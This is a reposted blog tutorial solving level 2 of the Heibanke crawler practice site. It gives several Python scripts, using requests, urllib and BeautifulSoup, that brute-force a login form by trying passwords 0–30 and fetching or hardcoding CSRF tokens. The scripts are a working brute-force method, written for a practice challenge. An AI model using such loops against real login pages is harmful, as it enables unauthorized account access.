Python Heibanke Crawler Challenge 2

On to the second challenge: the page asks for a nickname and a password to log in. The nickname can be anything; the password is a number no greater than 30. The page is shown in the figure below.

We will solve it with some basic Python web-scraping knowledge. There are two ways to do it.

I. Using the requests library and re regular expressions

1. Use the requests library to fetch the page.

2. Use re regular expressions to match the content.

3. The idea is to send requests.post() requests in a for loop, trying every password from 0 to 30.

After entering an arbitrary nickname and password, open the F12 developer console and find the POST request, as shown below.

In this challenge, the csrfmiddlewaretoken value in the Form Data is fixed at nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F.

It does not change with the username and password you enter, so Code 1 below can be used as-is.

If the csrfmiddlewaretoken value in the Form Data did change, you could write a function that reads it from the cookie, as shown in Code 2.

The code is as follows.

Code 1: the csrfmiddlewaretoken value in the Form Data is fixed

import requests
import re

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                         "Chrome/68.0.3440.106 Safari/537.36"}


def attack(password):
    url = "http://www.heibanke.com/lesson/crawler_ex01/"
    # The csrfmiddlewaretoken is fixed for this challenge, so it is hardcoded.
    data = {
           "csrfmiddlewaretoken": "nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F",
           "username": "admin",
           "password": password,
    }
    response = requests.post(url, headers=headers, data=data)
    # The page's hint (wrong password or success) sits in the first <h3> tag.
    html = re.findall(r'<h3>(.*?)</h3>', response.text)
    print(html[0])


def main():
    # Try every password from 0 to 30.
    for password in range(31):
        print(password)
        attack(password)


main()
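
Code 1 prints the hint for every attempt, so the password still has to be picked out of the output by eye. A small variant of the loop (just a sketch; it assumes the wrong-password hint contains the phrase "密码错误", which is the message the urllib version below matches against) stops as soon as the hint changes:

import requests
import re

headers = {"User-Agent": "Mozilla/5.0"}
url = "http://www.heibanke.com/lesson/crawler_ex01/"

for password in range(31):
    data = {
        "csrfmiddlewaretoken": "nUoIzgSBUlbZmCZW8QjtyrLnd7RjFM0F",
        "username": "admin",
        "password": password,
    }
    response = requests.post(url, headers=headers, data=data)
    hint = re.findall(r'<h3>(.*?)</h3>', response.text)[0]
    if "密码错误" not in hint:  # the hint no longer reports a wrong password
        print("password is:", password, "-", hint)
        break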

Code 2: the csrfmiddlewaretoken value in the Form Data is not fixed (this code also works when it is fixed)

import requests
import re

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0",
}


def get_csrf():
    # GET the page first; the server returns a csrftoken cookie in the response headers.
    url = 'http://www.heibanke.com/lesson/crawler_ex01/'
    response = requests.get(url, headers=headers)
    # Pull the token out of the Set-Cookie header with a regular expression.
    response = str(response.headers)
    csrf = re.findall('csrftoken=(.*?);', response)
    return csrf[0]


def attack(csrf, password):
    data = {
        "csrfmiddlewaretoken": csrf,
        "username": "admin",
        "password": password,
    }
    url = 'http://www.heibanke.com/lesson/crawler_ex01/'
    response = requests.post(url, headers=headers, data=data).text
    # Same as Code 1: the hint text sits in the first <h3> tag.
    info = re.findall('<h3>(.*?)</h3>', response)
    print(info[0])


def main():
    csrf = get_csrf()
    for password in range(31):
        print(password)
        attack(csrf, password)


main()

The output is as follows; the password can be read from it.
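
A note on Code 2: instead of scraping the token out of the stringified response headers with a regular expression, requests already parses the Set-Cookie header, and a requests.Session keeps that cookie for the later POSTs. A minimal sketch of that alternative (same URL and form fields as above):

import requests
import re

url = 'http://www.heibanke.com/lesson/crawler_ex01/'
session = requests.Session()
session.headers["User-Agent"] = "Mozilla/5.0"
session.get(url)                         # the server sets the csrftoken cookie here
csrf = session.cookies.get('csrftoken')  # read the token from the parsed cookies

for password in range(31):
    data = {"csrfmiddlewaretoken": csrf, "username": "admin", "password": password}
    text = session.post(url, data=data).text
    print(password, re.findall('<h3>(.*?)</h3>', text)[0])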

II. Using urllib.request, http.cookiejar, and bs4

The code is as follows.

from bs4 import BeautifulSoup
import urllib.request
import urllib.parse
import http.cookiejar

url = "http://www.heibanke.com/lesson/crawler_ex01/"
# Install an opener with a cookie jar so that cookies set by the first request
# (including csrftoken) are sent back automatically on the following POSTs.
cj = http.cookiejar.LWPCookieJar()
cookie_support = urllib.request.HTTPCookieProcessor(cj)
opener = urllib.request.build_opener(cookie_support, urllib.request.HTTPHandler)
urllib.request.install_opener(opener)

# Initial GET: fills the cookie jar.
data = urllib.request.urlopen(url).read()
data = data.decode('utf-8')
# headers and postData taken from the captured request (F12)
headers = {
    'Accept': 'text/html, application/xhtml+xml, image/jxr',
    'Referer': 'http://www.heibanke.com/lesson/crawler_ex01/',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'
    }
password = 0
while True:
    postData = {
        'csrfmiddlewaretoken': 'sczCT2OaFZ5BAxTXR0rBNSFuqummuY2y',
        'username': 'admin',
        'password': password
    }
    # Encode to bytes, otherwise urllib raises:
    # "POST data should be bytes or an iterable of bytes. It cannot be str."
    postData = urllib.parse.urlencode(postData)
    postData = postData.encode('utf-8')
    req = urllib.request.Request(url, postData, headers)
    response = urllib.request.urlopen(req)
    text = response.read().decode('utf-8')
    soup = BeautifulSoup(text, "lxml")
    msg = soup.body.h3.string
    # The site's "wrong password, please try again" hint; anything else means success.
    if msg == "您输入的密码错误, 请重新输入":
        password += 1
        continue
    else:
        print(msg)
        print("password is : " + str(password))
        break

The output is as follows.
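
One more design note on this version: the opener already stores the site's cookies in cj, so if the token were not fixed it would not need to be hardcoded in postData; it can be read from the cookie jar instead. A small sketch (assuming, as in method one, that the cookie is named csrftoken):

import urllib.request
import http.cookiejar

url = "http://www.heibanke.com/lesson/crawler_ex01/"
cj = http.cookiejar.LWPCookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
opener.open(url)                  # the GET stores the csrftoken cookie in cj

csrf = None
for cookie in cj:                 # a cookie jar is iterable
    if cookie.name == 'csrftoken':
        csrf = cookie.value
print(csrf)                       # use this value as csrfmiddlewaretoken in postData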

Click the link https://blog.csdn.net/Ljt101222/article/details/82428351 to go to Python Heibanke Crawler Challenge 3.

Reposted from blog.csdn.net/Ljt101222/article/details/81562621